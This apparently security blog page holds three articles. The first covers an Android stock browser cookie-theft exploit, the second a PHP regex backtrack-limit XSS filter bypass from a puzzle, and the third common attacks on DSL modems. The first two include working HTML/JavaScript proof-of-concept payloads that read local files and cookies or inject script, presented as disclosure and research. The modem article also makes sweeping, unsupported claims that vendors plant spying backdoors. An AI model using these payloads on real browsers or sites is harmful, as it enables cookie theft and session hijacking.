Latest News

Android Browser Cross Scheme Data Exposure + Intent Scheme Attack


tl;dr This exploit is an issue present in Android browser < 4.4 and several other android browsers which allows an attacker to read sqlite cookie database file and hence exposing all cookies. Along with it we also talk about a Cross Scheme Data exposure attack in Android < 4.4.

Introduction

During my research on ASOP (Stock Browser) I found out that is is possible to open links to local files using file:// protocol by from a webpage by selecting "Open Link in New tab" from the context menu". This itself is does not represent a vulnerability unless there is a way to read local files and use be able to retrieve the files remotely. However, what caught my attention here is this by default is not permitted browsers such as Chrome, Firefox, Opera etc.

The following screenshot demonstrates the error which is obtained when trying to access a local file from context menu.


Attack Plan 

In order to exploit this issue, the following was the attack plan we came up with:

i) User visits Attacker.com.
ii) Attacker.com forces a download (exploit.html) on the victim's browser using content disposition header. The purpose of the exploit.html would be read local files and send it back to the attacker.
iii) The victim opens up a link by selecting "Open Link in New tab" which opens the local file exploit.html which was forced as download.
iv) Our file exploit.html would then be reading other local files and sending it back to the attacker.

In order to write an effective exploit for the attack, I coped up with Haru Sugiyama a Security researcher from Japan. He came up with the following POC:

http://133.242.134.241/firefox/test.html

Upon accessing the above page from android browser, it would first force the following file "exploit.html". Both FireFox and Android browser save files to '/sdcard/Download/exploit.html' in case sdcard is available. The exploit.html file would then try reading the other local files. However, this was not easy as it looked at first sight. Let's first talk about how the results from Android Gingerbread were different from Jellbeans.

Android Gingerbread:Observations

In case of Android Gingerbread Emulator build 2.3 we are easily able to read other local files, this represents a vulnerability as in the browser, as it effectively allows a website to perform cross domains data theft and hence violating the same-origin-policy. The impact however is not large as roughly 11.4% of the users now use Android Gingerbread and they are dying slowly just like windows xp.



Android JellyBeans: Observations

In case jellybeans we found out that a local file was not able to read a local files,  We then tried our old null byte trick and it worked like a charm.

The following is the POC:

<button onclick="exploit()">Read iframe</button>
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button>
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe>
<script>
function exploit() {
  var iframe = document.getElementsByTagName('iframe')[0];
  try{
    alert("Try to read local file.");
    alert("contentWindow:"+iframe.contentWindow);
    alert("document:"+iframe.contentWindow.document);
    alert("body:"+iframe.contentWindow.document.body);
    alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);
  } catch(e) {
    alert(e);
  }
}
</script>

However, due to the discovery of CVE-2014-6041 the nullbytes issue was already patched and the above exploit did not work on patched devices.

Intent URL Scheme Attack

Based upon our above findings it was concluded that in Android Jellybeans the access to local files was not an issue due to the fact that a local file could not read other local files. However Joe Vennix from metasploit team came up with a more strong way to exploit it by abusing the intent scheme. The following paper -> http://www.mbsd.jp/Whitepaper/IntentScheme.pdf describes a potential way of exploiting this issue.  The following is the POC described in the paper:

The idea behind the attack vector is to saved a cookie containing javaScript code and trick the victim into opening the sqlite database file. Upon viewing the injected javascript would be executed in the context of a cookie file and would grab the rest of the cookies from the database file. Following is the basic POC, when when executed would read the entire webviewCookieChromium.db file.

<!doctype html>
      <html>
        <head><meta name="viewport" content="width=device-width, user-scalable=no" /></head>
        <body style='width:100%;font-size: 16px;'>
          <a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'>
            Redirecting... To continue, tap and hold here, then choose "Open in a new tab"
          </a>
          <script>

           document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';   

</script>
        </body>
      </html>

Joe has created a Metasploit module, which automates the process of stealing the cookies and sending it back to you , since the db file also contains httponly cookies as well this attack is quite dangerous.

Steps to Reproduce with Metasploit



The following screenshots would walk you through the process of exploiting and retrieving the cookies:

Step 1 - Setting up the Module


Step 2 - Stealing The Cookies


All you need to sit back and watch the cookies coming to you. 




Step 3 - Enjoy



Patch

The access to the data directory was tightened back in Feb 2014, however due to the android patch policies the patch did not make to most of the vendors. 

Credits

I would like to thank Tod Beardsley and Joe Vennix  from the metasploit team for their extensive support with analyzing and helping to co-ordinate with Google effectively. As well as Haru Sugiyama for his help and support.

Bad Meets evil - PHP meets Regular Expressions

twi

This article would briefly discuss the reason why Regular Expressions might not be suitable for filtersand how things could turn miserably bad when PHP comes is used with Regular Expressions. The post would then continue with the write-up of a relevant scenario based challenge, and finally will conclude with the author’s opinion on the topic.

Common pitfalls of Regular expressions

RegEx (Regular expressions) are commonly used for pattern matching, searching and replacing purposes; which are handy for string manipulation in different supported back-end programming languages. In reality, there are ton of filters [1] which heavily rely upon RegEx to filter out malicious inputs.

We have already witnessed [2] why RegEx might not be considered as a good idea. However, one might argue that it is the programmers' fault (or rather choice of options) - they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, the Microsoft's current XSS filter [3] is a good example of it. Following are some of the problems:

Problem#1: Under the hood for the first problem, the filter currently employs a very long RegEx, to which surprisingly, has no public bypasses available. But one should not forget it actually evolves from the previous vulnerable versions, and one really must have the patience to write such a tedious RegEx.

Problem#2: The second problem is that even with a functional RegEx, this entirely could lead to different vulnerabilities. Yes; I'm talking about ReDoS(Regular Expression Denial of Service), an attack which happens to be surfaced in bad constructed Regex wherein attackers could compromise the availability of the application with a specially crafted input.

In a long run, with the programmer’s perspective, it might be a bit tedious for developers to handle both functionality and security at one hand. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when being heavily used in filters.

PHP + RegEx = ?

PHP itself is not bad, however when combined with regex becomes bad. Regarding RegEx, Most of the used RegEx functions (i.e. preg_*) in PHP are based upon the PCRE library. The engine itself is not only deficient in terms of performance, but it also opens to have a potential gateway to REDOS vulnerabilities.

As we can see from a REDOS issue in PHP's famous frame work Code Igniter [4], a non-harmful RegEx (e.g. `/[a-z]+=/`) can cause a serious performance damange. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP is so smart that it provides an option called pcre.backtrack_limit. What it does is to limit the number of backtracks (backtrack is a common cause of ReDoS). But what if the number of backtracks reaches the limit? Well, it just doesn't care. In other words, it is possible to evade specific protections when the conditions are met.

The write-up


In order to demonstrate how serious the problem could be, I had ended up creating a mini XSS puzzle of the kcal.pw series. Here is the sample code for this puzzle:
$xss = $_POST['xss'];
if (preg_match('/<(?:\w+)\W+?[\w]/', $xss)) {
echo '<p>I don\'t think so</p>';
} else {
echo $xss;
}

Let’s take a look at the following RegEx and what see it does: ```/<(?:\w+)\W+?[\w]/```

It detects any presence of an open tag, followed by any potential attributes, separators and whatsoever. Although the RegEx looks specious, it is technically sufficient for preventing XSS in HTML context. If you look closely, you will find the RegEx utilizes non-greedy matching which requires backtracking. As mentioned before, PHP has a default backtrack limit (pcre.backtrack_limit, 100000). However, PHP favours "fail silently", which makes pcre_match simply returns false instead of throwing an exception when the input reaches the limit. As a result, submitting a long enough payload will bypass the filter.

Let’s try using the preg_match function to test the regular expression with a large number of A’s:
var_dump(preg_match('/<(?:\w+)\W+?[\w]/', '<a/'.str_repeat('\\', 1000000).'/a'))

The proof of concept is simple. It simulates the input being matched with the vulnerable RegEx (A being repeated 1000000 times). And it does return false.

Proof Of Concept

The following is a complete proof of concept that would generate alert(1) on the challenge domain:
<form action="http://s30003-101809-vkp.tarentum.hack.me/index.php" method="post">
    <textarea style="display: none" name="xss"></textarea>
  </form>
<script>
document.forms[0].xss.value = '<script' + Array(999999).join('/') + '>alert(1)<\/script>';
document.forms[0].submit();
</script>

Conclusion


The suggestion for the defense is to use RegEx only if absolute necessary. More importantly, avoid writing bad RegEx. Although there are some tools which claim to analyze potential ReDoS problem, the best practice is to again to substantially limit the use of RegEx. Finally, this is a take-away (which is also my “right” rule thumb principle):

 If a filter relies too heavily on a Regex, then it might probably fail its job in terms of security!

About The Author


This article has been written by "File Descriptor", he prefers to be called as an "XSS Jigsaw" instead of his real name, which he prefers to keep secret. FD has decided to dedicate his life towards creating and solving XSS challenges and that is what in my opinion a hacker really is, a problem solving expert. You can follow him at @filedescriptor

References

1. http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/
2.  http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags
3. http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html
4. https://github.com/bcit-ci/CodeIgniter/issues/3123

Common Attacks Against Modems

0x01: Introduction to Modems

The term DSL modem is technically used to describe "a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot". The more common DSL router which combines the function of a DSL modem and a home router is a standalone device which could be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called as a "residential gateway", a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.


Most consumer DSL lines use one of several variations and varieties of Asymmetric DSL (ADSL). The "asymmetric" DSL here means that more of the bandwidth of the line is dedicated to downstream (download) data than upstream (upload) data. Hence, download rates are faster than upload rates since most users download much larger quantities of data than they actually upload. Because the telephone lines were never designed to carry such high frequency signals, DSL is distance-sensitive. The farther away from the switching center the modem is, the longer the telephone wires, the weaker the signal, and the lower the data rate that the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher rate service, up to 8 Mbit/s than the expected rate for the same service in remote areas.

Reference: en.wikipedia.org/wiki/DSL_modem

0x02: Market Share

The modem manufacturers mostly are mostly chinese based . Research shows that companies like ZTE & Huawei are doing very well and have gained enterprise router share in china over the past year. In China ZTE is placed third player in 2013 and 2014 with dizzying rise this year than the popular consortium Cisco. (Which happens to be more secure). This is also due to the fact that cisco's products are very costly and difficult for the home users to afford. 





0x03: Backups& Backdoors

All modems include  Backup files mainly because of the need to recover the modem to the original state after a reset. However, knowing the direct link to the backup file puts the modem directly in danger. All an attacker has to do is request the backup file and view it; mostly this is juicy plain info that contains passwords, ISP configurations.

Knowing this however, some vendors try to encrypt the contents that are inside these files. So downloading this would be useless for the attacker. But this isn’t entirely impossible as lots of vendors tend to use weak encryption mechanisms to encrypt backup file. And research done by white hats such as Osanda Malith shows that. He for example provided a PoC tool used to decrypt these rom-0 (Backup) files from most modems, including ZTE and TP-Link.

Most of the chinese Vendors such as ZTE are banned from the US, one because they being incredibly insecure and two because, they put malicious backdoors to snoop and eavesdrop on individuals and organizations.

Lots of trusted companies such as TP-Link, Huawei and other chinese companies have a record of placing backdoors in their products. These backdoors are normally in form of open ports which on connecting would provide a reverse shell. The ports are often found to be high in number to make it harder to detect.

One of such examples can be found here. This lets them capture sensitive files and sometimes sell it for residing countries. This strategy is great one for governments to spy on their citizens as well as for great as a part of a cyber attack against a particular country. So for example: A country could sell cheap  backdoored modems to a target country, and in case the modems end up being used on military and sensitive systems, then they have hit a jackpot. 

0x04: Default Configuration details and Hardcoded Credentials

Apparently, all if not most modems come with very easy to guess password configurations. Infact, most of them are identical like: username:admin and password: admin. Most people do not change the configuration details and most ISP’s leave this as default.

This amazingly is a good news for malicious users. Because all they have to do is know the vendor and they can get their hands on it easily using sites such as http://www.routerpasswords.com/ to extract information.

0x05: XSRF and XSS

These two are two of the most common flaws in the history of web security. Mmost ZTE modems do not use anti-XSRF tokens (Used to prevent CSRF Attacks) on any sensitive request.

XSS is even more worsed because if one found an XSS flaw in any modem (which is likely), he can send that link to a logged in administrator and perform any action in behalf of the admin, this could be done by stealing the XSRF-Token. Also, an XSS could also allow session hijacking and other browser attacks.

XSRF flaws are more commonly found in modems as opposed to xss due to the fact that modems use HTTP authentications most of the time. So Headers are mainly used in communications protocols to communicate with one another. This makes it harder for the modem to detect and create anti-csrf tokens other than to compare it.

Because of these or just because of careless developing it is sometimes possible in to tricking admins changing passwords, issuing commands or easing access. 

0x06: Social Engineering

What would you say if a blocked number called you and told you that she is from your ISP and she needs your credentials in order to add/maintain the new and revised 3G technology into your modem. Or even she asks you to maintain security flaws in your modem? You surly never expect this to be a troll. I mean, why would you? And then next thing you know, she snooped your configuration password. Knowing this password could mean (since lots of people use same passwords) that she got access to email password, financial account, etc. 

0x07: Exploit Databases

Many Exploit databases hold juicy info about modems. Including default configurations, XSRF/XSS/LFI flaws, logical issues, backdoors. So all you need to do is to find the modem version and give a search on exploit databases such as exploit-db.com, 1337day.com etc

So say, in case you found an exploit against a previous version of a modem, however not for the exact version. This necessary doesn't mean yours isn’t vulnerable to the particular exploit you found. Infact most vendors use same architecture to construct the web architecture of their modems. So one XSS on one model could mean XSS on all other vendor modems.

0x08: Eavesdropping

The lack of SSL usually means bad luck for modems. Especially if it’s for office/public usage because the admin is always in risk of accessing any file from the modem. The reason being, that it is very easy to sniff ongoing traffic with with tools like Wireshark.

The fact that modems use login protocols like HTTP authentication puts them in more danger because when requesting any file, the modem should request the authentication header and the admin responds in (mostly Base64 form), and an attack easily can sniff this and decode the communication easily it.

Even when using SSL (note very few modems use it), it can still be insecure and even pose more risk. Recently, A lot of attacks have been identified against SSL protocols Heartbleed, POODLE to name a few. 

0x09: Denial Of Service

Denial of Service is one of the most annoying things I can think of next to a Log out CSRF. People with bad intentions can use this type of attack to knock a modem out of delivering internet and sometimes even let the modem reset itself.

This is really crazy for people trying to do their job. The fact this attack can easily be turned an untraceable attack can make your business day a big pain just because you choose to use a vulnerable modem.

Most modems by design don’t hold more HDD than 25MB and less than 2MB ram with no DOS protections. This usually means they can handle limited amount of data with huge amount of time. All an attacker has to do is send more requests than the modem can handle and hence exhausting it's memory and resulting in a DOS.

0x10: Lack Of Updates

Modem users seldom receive updates for modems in case a critical vulnerabilities have been identified in the wild, and a lot of them don't really have a mechanism for providing OTA (Over the Air) updates. A lot of times, users manually have to upgrade the firmware and ofcourse which is not possible for people having lack or no technical knowledge. 

0xA: Suggestions

  1. If you are an admin/user of a modem, Try not to stay logged in to make attacks like XSRF,XSS and ClickJacking less effective. .
  2. Try doing a little research about the modem model you are trying to buy. Google exploits for it, try to search if it uses secure connection (TLS), if it is vulnerable, why should you. Look for another.
  3. Try disabling remote access to decrease the attacker’s possibility of gaining access over the internet; since most of the modem exploits require LAN access, it’s a good thing to disable Telnet, web and even ftp access to modem remotely.
  4. Limit Physical Access. Because, most modems have a physical hard reset key/button, it should be noted most of them should remain in a secured environment where only authorized people can reach.

About the Author:

This following article is a guest post by Paulos Yibelo. Yibelo is the newest member of RHA family. He is a full time PHP coder and most of his research is involved with application security. In his free time he loves writing articles related to application security http://paulosyibelo.blogspot.com/. - See more at: http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html#sthash.b5OotKP6.dpuf
This following article is a guest post by Paulos Yibelo. Yibelo is the newest member of RHA family. He is a full time PHP coder and most of his research is involved with application security. In his free time he loves writing articles related to application security http://paulosyibelo.blogspot.com/

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code